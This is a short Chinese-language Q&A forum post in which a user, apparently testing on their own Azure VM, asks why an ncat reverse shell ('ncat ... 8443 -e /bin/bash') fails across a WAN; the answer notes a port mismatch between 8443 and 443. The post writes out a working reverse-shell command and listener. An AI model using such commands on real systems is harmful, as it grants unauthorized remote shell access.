在 wan 目标上使用 ncat 打开 shell

在 wan 目标上使用 ncat 打开 shell

我创建了一个 Azure VM,并配置了一个 ngrok 服务器以使我的本地主机可从互联网访问,并且我将 VPN 放到 VM 上以模拟 WAN 攻击。

我想要设置到 VM 端口的 TCP 连接并创建反向 shell 以获取 root 访问权限。为了完成此任务,我使用了以下命令: 

ncat 200..225 8443 -e /bin/bash -v

 他的输出是:  Ncat: Connected to 200.225:443

但是当我尝试监听连接以打开 shell 时 ncat -l 8443 -v,它只是保持监听状态并且不建立连接:

Ncat: Version 7.80 ( https://nmap.org/ncat ) 
Ncat: Listening on:::8443 
Ncat: Listening on 0.0.0.0:8443

当两台机器都在同一个局域网中时,我进行了这个测试,它运行良好。但在广域网目标中它不起作用。

所以我的问题是:您知道 ncat 如何在 wan 之外建立连接并设置反向 shell 吗?

答案1

您的 netcat 正在监听端口 8443

您正在连接到端口 443

这些是不同的端口。

相关内容